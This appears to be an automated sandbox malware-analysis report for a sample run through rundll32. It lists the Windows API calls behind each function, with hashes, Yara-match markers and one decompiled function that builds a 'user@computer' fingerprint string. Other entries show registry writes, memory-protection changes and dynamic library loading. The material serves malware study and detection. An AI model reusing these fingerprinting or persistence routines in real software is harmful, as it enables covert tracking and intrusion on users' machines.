                                          • Instruction ID: 9b0d2c6d7ad7da4b7c83e4bec354ba75d5193dda0cc9069ce553926427682450
                                          • Opcode Fuzzy Hash: 3bdc653adcd02619f56bab789dec36e301a6015e6a42485e051527b9bbe8ce62
                                          • Instruction Fuzzy Hash: 8B315A72500209EFDB11DF95DC89EEE7BB9EF44311F1085A4FD19A2210DB749A55CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B6ACA0: RtlEnterCriticalSection.NTDLL(00B79448), ref: 00B6ACA8
                                            • Part of subcall function 00B6ACA0: RtlLeaveCriticalSection.NTDLL(00B79448), ref: 00B6ACBD
                                            • Part of subcall function 00B6ACA0: InterlockedIncrement.KERNEL32(0000001C), ref: 00B6ACD6
                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00B52793
                                          • memcpy.NTDLL(00000000,?,?), ref: 00B527A4
                                          • lstrcmpi.KERNEL32(00000002,?), ref: 00B527EA
                                          • memcpy.NTDLL(00000000,?,?), ref: 00B527FE
                                          • HeapFree.KERNEL32(00000000,00000000,?), ref: 00B52844
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                                          • String ID:
                                          • API String ID: 733514052-0
                                          • Opcode ID: c6ba02dd62afc00ac29ebc8457c246cb191ca68a2355ac52f24f8ddb90f90cd7
                                          • Instruction ID: 91f30b26538db2263fe18cd16c93e45d39b78e3d42072a3937f7a19c2d5d231e
                                          • Opcode Fuzzy Hash: c6ba02dd62afc00ac29ebc8457c246cb191ca68a2355ac52f24f8ddb90f90cd7
                                          • Instruction Fuzzy Hash: D8318076900219BFDB109FA4DCC8B9E7BF8EF05355F1440A9FE09A7210E7359D888B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04893268() {
                                          				long _v8;
                                          				long _v12;
                                          				int _v16;
                                          				long _t39;
                                          				long _t43;
                                          				signed int _t47;
                                          				short _t51;
                                          				signed int _t52;
                                          				int _t56;
                                          				int _t57;
                                          				char* _t64;
                                          				short* _t67;
                                          
                                          				_v16 = 0;
                                          				_v8 = 0;
                                          				GetUserNameW(0,  &_v8);
                                          				_t39 = _v8;
                                          				if(_t39 != 0) {
                                          					_v12 = _t39;
                                          					_v8 = 0;
                                          					GetComputerNameW(0,  &_v8);
                                          					_t43 = _v8;
                                          					if(_t43 != 0) {
                                          						_v12 = _v12 + _t43 + 2;
                                          						_t64 = E04894DF6(_v12 + _t43 + 2 << 2);
                                          						if(_t64 != 0) {
                                          							_t47 = _v12;
                                          							_t67 = _t64 + _t47 * 2;
                                          							_v8 = _t47;
                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                          								L7:
                                          								E04894C73(_t64);
                                          							} else {
                                          								_t51 = 0x40;
                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                          								_t52 = _v8;
                                          								_v12 = _v12 - _t52;
                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                          									goto L7;
                                          								} else {
                                          									_t56 = _v12 + _v8;
                                          									_v12 = _t56;
                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t56 + 2, 0, 0);
                                          									_v8 = _t57;
                                          									if(_t57 == 0) {
                                          										goto L7;
                                          									} else {
                                          										_t64[_t57] = 0;
                                          										_v16 = _t64;
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v16;
                                          			}


                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 0489327C
                                          • GetComputerNameW.KERNEL32(00000000,?), ref: 04893298
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 048932D2
                                          • GetComputerNameW.KERNEL32(?,?), ref: 048932F5
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,?,00000000,?,00000000,00000000), ref: 04893318
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: 222091d1aebd02bd5d05085a31ec2cf03a07b00bec1c2e7d624ec2196683bea8
                                          • Instruction ID: 5c4043dc8f9ed426dcfb26176e26a7fdb51aab5948d5cb7a61e3ac0d32d46c0c
                                          • Opcode Fuzzy Hash: 222091d1aebd02bd5d05085a31ec2cf03a07b00bec1c2e7d624ec2196683bea8
                                          • Instruction Fuzzy Hash: 9121F8B6900548FFDB11DFE8D9848EEBBB8EF48304B5449AAE501E7240EA34AF05DB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,00B5AB98), ref: 00B5E23D
                                          • GetComputerNameW.KERNEL32(00000000,00B5AB98), ref: 00B5E259
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • GetUserNameW.ADVAPI32(7477C740,00B5AB98), ref: 00B5E293
                                          • GetComputerNameW.KERNEL32(00B5AB98,?), ref: 00B5E2B6
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,7477C740,00B5AB98,00000000,00B5AB9A,00000000,00000000,?,?,00B5AB98), ref: 00B5E2D9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: cb58eab08aa1db17491cee674f44d04d82c2e66825153b40dc5b82d29059badb
                                          • Instruction ID: 1b729df3336740b780f2076014f884300f4801f8e570e170d8f08b432055b7ae
                                          • Opcode Fuzzy Hash: cb58eab08aa1db17491cee674f44d04d82c2e66825153b40dc5b82d29059badb
                                          • Instruction Fuzzy Hash: 7021F8B6900218FFCB11DFE8C9859AEBBFCEF48305B5044AAE915E7204DB319B44DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B6C9C0: lstrlen.KERNEL32(00000000,00000000,?,00000000,00B71538,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 00B6C9CC
                                          • RtlEnterCriticalSection.NTDLL(00B79448), ref: 00B7154E
                                          • RtlLeaveCriticalSection.NTDLL(00B79448), ref: 00B71561
                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B71572
                                          • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00B715DD
                                          • InterlockedIncrement.KERNEL32(00B7945C), ref: 00B715F4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                                          • String ID:
                                          • API String ID: 3915436794-0
                                          • Opcode ID: f24338f4bba3b62f8dc59761bf1931953a5f9181bd4771d50666656b81744bac
                                          • Instruction ID: 9cb92928d81fb4ff6a9e9ec23cacc71a31198566e3bdfc9caed53b01d7ec7312
                                          • Opcode Fuzzy Hash: f24338f4bba3b62f8dc59761bf1931953a5f9181bd4771d50666656b81744bac
                                          • Instruction Fuzzy Hash: 6131B1325056059FC721DF6CD84892ABBF8FB44325F058969F96E83220DB30D852CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryA.KERNEL32(?,?,00000000,00000000,00B6601E,00000000,76DDF5B0,00B6339A,?,00000001), ref: 00B65E48
                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B65E5D
                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,00B5BF69,?,?,?,?,?), ref: 00B65E79
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B65E8E
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B65EA2
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad$AddressProc
                                          • String ID:
                                          • API String ID: 1469910268-0
                                          • Opcode ID: 1ea0e0829d7b33f3a6b2a90c8a003abe290c9f7245677b093f33609683aae8ec
                                          • Instruction ID: 80711d62f75e2ae03cec6fc124740a9aed4b3fa0e3bba920d94e63f6d815fa73
                                          • Opcode Fuzzy Hash: 1ea0e0829d7b33f3a6b2a90c8a003abe290c9f7245677b093f33609683aae8ec
                                          • Instruction Fuzzy Hash: C131BD72640606AFCB14CF68EC88E5133F9FB49310B8540A9E50CE7760DF35AD92CB01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666CE
                                            • Part of subcall function 00B666BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B666E7
                                            • Part of subcall function 00B666BC: GetCurrentThreadId.KERNEL32 ref: 00B666F4
                                            • Part of subcall function 00B666BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B66700
                                            • Part of subcall function 00B666BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00B543E4,00000F00), ref: 00B6670E
                                            • Part of subcall function 00B666BC: lstrcpy.KERNEL32(00000000), ref: 00B66730
                                          • DeleteFileA.KERNEL32(00000000,000004D2), ref: 00B61081
                                          • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00B6108A
                                          • GetLastError.KERNEL32 ref: 00B61094
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B61153
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
                                          • String ID:
                                          • API String ID: 3543646443-0
                                          • Opcode ID: f89c1f81cdb3d0dfb843f6266e42b0d09e9ac045e2efc8bbd58822de9f768697
                                          • Instruction ID: 665fc8f3d6f79dbe0cc75ed3bb6c6495b1228297bc4fa2793f87925ea5eef0e1
                                          • Opcode Fuzzy Hash: f89c1f81cdb3d0dfb843f6266e42b0d09e9ac045e2efc8bbd58822de9f768697
                                          • Instruction Fuzzy Hash: 0C2160B25052187FDA10A7A4EC4DF8B3BECDF46352B1540D1FB0ED7261DB649945CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,00B6A2F0,00000000,?,?), ref: 00B713D9
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,00B6A2F0,00000000,?,?,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B713E9
                                          • ReadFile.KERNEL32(?,00000000,00000000,00000000,00000000,00000001,?,?,00B6A2F0,00000000,?,?,?,00000000,-00000007,00B6377E), ref: 00B71415
                                          • GetLastError.KERNEL32(?,?,00B6A2F0,00000000,?,?,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B7143A
                                          • CloseHandle.KERNEL32(000000FF,?,?,00B6A2F0,00000000,?,?,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B7144B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateErrorHandleLastReadSize
                                          • String ID:
                                          • API String ID: 3577853679-0
                                          • Opcode ID: 3987f0ce8bdf50afc2dfdcd4eb2117272a85cbb66ff58f3320c018cce2668bfa
                                          • Instruction ID: 273d2b9f26b98c11f245bbee62c24951b57af516df348e2a46cfbbe30354ca04
                                          • Opcode Fuzzy Hash: 3987f0ce8bdf50afc2dfdcd4eb2117272a85cbb66ff58f3320c018cce2668bfa
                                          • Instruction Fuzzy Hash: 2411E732100214BFDB205F6CDC84EAE7BEDEB04755F1189A5FE2DA7290C7709D808A70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • StrChrA.SHLWAPI(?,0000002C), ref: 00B5148F
                                          • StrRChrA.SHLWAPI(?,00000000,0000002F), ref: 00B514A8
                                          • StrTrimA.SHLWAPI(?,?), ref: 00B514D0
                                          • StrTrimA.SHLWAPI(00000000,?), ref: 00B514DF
                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000), ref: 00B51516
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Trim$FreeHeap
                                          • String ID:
                                          • API String ID: 2132463267-0
                                          • Opcode ID: ab6f7491239176d689bd3c7c3075e4e25ae5331f059469d237f7e351ca228b6a
                                          • Instruction ID: 3ae8014104113065bcef2aefbd1cc40bec5303b57c74c21273a2980134ba3466
                                          • Opcode Fuzzy Hash: ab6f7491239176d689bd3c7c3075e4e25ae5331f059469d237f7e351ca228b6a
                                          • Instruction Fuzzy Hash: D2119636240205BBDB229B69DC88F9B7BECDB44751F1404A5FE09DB251DF71DD448B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,055CE5A8,00B6BAB4,00B6D73E,?,?,?,00B69DA8,76D85520,?,00B6BAB4,00000000), ref: 00B6B70F
                                          • VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,?,00B69DA8,76D85520,?,00B6BAB4,00000000,?,00000000,00B6D73E,00000000), ref: 00B6B73F
                                          • RtlEnterCriticalSection.NTDLL(00B79420), ref: 00B6B74E
                                          • RtlLeaveCriticalSection.NTDLL(00B79420), ref: 00B6B76C
                                          • GetLastError.KERNEL32(?,00B69DA8,76D85520,?,00B6BAB4,00000000,?,00000000,00B6D73E,00000000), ref: 00B6B77C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                          • String ID:
                                          • API String ID: 653387826-0
                                          • Opcode ID: caa810a6b6a5033091f893169b04b5ea8835e66e43f5d9e5a9c4272d9d3bb757
                                          • Instruction ID: e94392c2d750c2ca9df8fc013aec3fa3b266a12a0ccfdea4e4f0412f4c999cc4
                                          • Opcode Fuzzy Hash: caa810a6b6a5033091f893169b04b5ea8835e66e43f5d9e5a9c4272d9d3bb757
                                          • Instruction Fuzzy Hash: 6521EAB5600705EFC721DFA8C985956BBF8FF08314B008569EA5AD7710D770ED54CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 00B57BAF
                                          • GetLastError.KERNEL32 ref: 00B57BD2
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B57BE5
                                          • GetLastError.KERNEL32 ref: 00B57BF0
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B57C38
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                                          • String ID:
                                          • API String ID: 1671499436-0
                                          • Opcode ID: e985947da40575544a10bf1c2ea67fefe6ec4cd4e350939910b3b2076144945a
                                          • Instruction ID: f44d6991cf539ef47669c8275b444b6c7ea1ebd564b7042393f4effc91b87703
                                          • Opcode Fuzzy Hash: e985947da40575544a10bf1c2ea67fefe6ec4cd4e350939910b3b2076144945a
                                          • Instruction Fuzzy Hash: 2D21AE70244244EFEB219F54EC8CB5A7BF9EB00316F6008E8EA46975A0CF719DC8DB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegCreateKeyA.ADVAPI32(80000001,?,-00000005), ref: 00B52F82
                                          • memcpy.NTDLL(00000000,00000001,-00000005,-00000005,-00000005,?,00B51B3D,?,00000000,-00000005,00000001), ref: 00B52FAB
                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,-00000005), ref: 00B52FD4
                                          • RegSetValueExA.ADVAPI32(-00000005,?,00000000,00000003,00000000,00000000,-00000005,?,00B51B3D,?,00000000,-00000005,00000001), ref: 00B52FF4
                                          • RegCloseKey.ADVAPI32(-00000005,?,00B51B3D,?,00000000,-00000005,00000001), ref: 00B52FFF
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Value$AllocateCloseCreateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2954810647-0
                                          • Opcode ID: 91e549ea2b59b41a10ecd8192e0e220ccb216df04e5e469e47ee313bbe53534e
                                          • Instruction ID: 523d79df3906f4f2a255276a394eb2fb1e36111c1df87c53880d409fd93ed729
                                          • Opcode Fuzzy Hash: 91e549ea2b59b41a10ecd8192e0e220ccb216df04e5e469e47ee313bbe53534e
                                          • Instruction Fuzzy Hash: D911A372140209BFDF125F64BC45FAB7BBDEB49352F0400A5FE05A32A1DA328D6497B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B60B8A
                                          • memcpy.NTDLL(?,?,00000009), ref: 00B60BAC
                                          • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 00B60BC4
                                          • lstrlenW.KERNEL32(?,00000001,?), ref: 00B60BE4
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?), ref: 00B60C09
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3065863707-0
                                          • Opcode ID: 3b4fd0e46f68c27dc773fb4e2ec0382122c059e04d844fd38e1c3df9dd6ce008
                                          • Instruction ID: cbd11dc920a9fb71f6ba4b97c38d6536b963a10ffc03d47cd956c7135fa98b2e
                                          • Opcode Fuzzy Hash: 3b4fd0e46f68c27dc773fb4e2ec0382122c059e04d844fd38e1c3df9dd6ce008
                                          • Instruction Fuzzy Hash: 04118636D41208BBDF119BA5DC49FCE7BB8EB08311F048091FA09E7291DB74D689CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrcmpi.KERNEL32(00000000,?), ref: 00B61872
                                          • RtlEnterCriticalSection.NTDLL(00B79448), ref: 00B6187F
                                          • RtlLeaveCriticalSection.NTDLL(00B79448), ref: 00B61892
                                          • lstrcmpi.KERNEL32(00B79460,00000000), ref: 00B618B2
                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B5D570,00000000), ref: 00B618C6
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                                          • String ID:
                                          • API String ID: 1266740956-0
                                          • Opcode ID: c9fb0a4e44aa3d614589755353d168d96c67ccc93cce617193a794e276e8ed9b
                                          • Instruction ID: 541920651e18eb74f87247dae8c6603eae887fb2edde4b26c4bc1a456f97b688
                                          • Opcode Fuzzy Hash: c9fb0a4e44aa3d614589755353d168d96c67ccc93cce617193a794e276e8ed9b
                                          • Instruction Fuzzy Hash: F1118E32900209EFDB14DF5CD849A99B7F8FF04325F0980A6E51D93260DB38AD41CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000008,00B64325,00000000,00000000,00000000,00000000,00000000,?,00B5479A,00000000,00000000,00000000,00000000), ref: 00B65B88
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00B65BAC
                                          • StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,00B5479A,00000000,00000000,00000000,00000000), ref: 00B65BB3
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00B65BFB
                                          • lstrcat.KERNEL32(00000000,?), ref: 00B65C0A
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                                          • String ID:
                                          • API String ID: 2616531654-0
                                          • Opcode ID: bf1b294aefc177ce3393ffadbd534beb668917ab23cbdee53b9476c36b7d6ec7
                                          • Instruction ID: f33ea9016b5c24cec759c5f810efc53bdd7ae39a3324c4e44d198adb7e66ac80
                                          • Opcode Fuzzy Hash: bf1b294aefc177ce3393ffadbd534beb668917ab23cbdee53b9476c36b7d6ec7
                                          • Instruction Fuzzy Hash: CF117C76104606ABD7319F69DC88E6BBBECEB84341F090468F609D3240DF39DDA5C725
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B6C9C0: lstrlen.KERNEL32(00000000,00000000,?,00000000,00B71538,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 00B6C9CC
                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00B6C32A
                                          • memcpy.NTDLL(00000000,?,?), ref: 00B6C33D
                                          • RtlEnterCriticalSection.NTDLL(00B79448), ref: 00B6C34E
                                          • RtlLeaveCriticalSection.NTDLL(00B79448), ref: 00B6C363
                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 00B6C39B
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                                          • String ID:
                                          • API String ID: 2349942465-0
                                          • Opcode ID: a709e5eb0b227bbf50f427deb25e94281c7060d9007670094606d79b6878c9f9
                                          • Instruction ID: fb6efe801818919f1e3415f8b8c4c58622c9283cec5ae938cf90dfd809114161
                                          • Opcode Fuzzy Hash: a709e5eb0b227bbf50f427deb25e94281c7060d9007670094606d79b6878c9f9
                                          • Instruction Fuzzy Hash: 4811E572101250AFC7215F28EC88C6B7BFCEB4632270185BAF95E93320CB355C55CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(00B5B047,00000000,00000000,00000000,?,00B7090A,?,00B5B047,00000000), ref: 00B6A968
                                          • lstrlen.KERNEL32(?,?,00B7090A,?,00B5B047,00000000), ref: 00B6A96F
                                          • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 00B6A97D
                                            • Part of subcall function 00B56FF3: GetLocalTime.KERNEL32(?,?,?,?,00B5161B,00000000,00000001), ref: 00B56FFD
                                            • Part of subcall function 00B56FF3: wsprintfA.USER32 ref: 00B57030
                                          • wsprintfA.USER32 ref: 00B6A99F
                                            • Part of subcall function 00B6EAB5: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,00B6A9C7,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 00B6EAD3
                                            • Part of subcall function 00B6EAB5: wsprintfA.USER32 ref: 00B6EAF8
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 00B6A9D0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                                          • String ID:
                                          • API String ID: 3847261958-0
                                          • Opcode ID: ff8ae012625a843810aa1cdc11f12c73846d19c377518c7d8afd078651ef7e11
                                          • Instruction ID: d4dd53ba89a1ee7dc7262615aafea9be716272f43169300a160ff59ad95c36f7
                                          • Opcode Fuzzy Hash: ff8ae012625a843810aa1cdc11f12c73846d19c377518c7d8afd078651ef7e11
                                          • Instruction Fuzzy Hash: 3001C432100218BFDF112F66EC48E9A7F6EFB80761B108462FD1D97161DB368994DFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,00000000,0000EA60,00000000,00000000,00000000,?,00B6A6B6,?,?,00000000,00B5D3E9,?,00000000), ref: 00B6C0CF
                                          • ResetEvent.KERNEL32(?,?,00B6A6B6,?,?,00000000,00B5D3E9,?,00000000), ref: 00B6C0D4
                                          • GetLastError.KERNEL32(00B6A6B6,?,?,00000000,00B5D3E9,?,00000000), ref: 00B6C0EF
                                          • GetLastError.KERNEL32(0000EA60,00000000,00000000,00000000,?,00B6A6B6,?,?,00000000,00B5D3E9,?,00000000), ref: 00B6C11E
                                            • Part of subcall function 00B5F123: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,00B6C0A9,00000000,00000000,00000004,00000000,?,00B6A6B6,?,?,00000000), ref: 00B5F12F
                                            • Part of subcall function 00B5F123: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00B6C0A9,00000000,00000000,00000004,00000000,?,00B6A6B6,?), ref: 00B5F18D
                                            • Part of subcall function 00B5F123: lstrcpy.KERNEL32(00000000,00000000), ref: 00B5F19D
                                          • SetEvent.KERNEL32(?,00B6A6B6,?,?,00000000,00B5D3E9,?,00000000), ref: 00B6C110
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1449191863-0
                                          • Opcode ID: dfa11efa456a2f137c8709a26c15811f2ffcb44faf2517a5ec3839de5d4cddc8
                                          • Instruction ID: dc3691e93cd49b55bb03279b35a00227b7ed7849232003776425daac62376e58
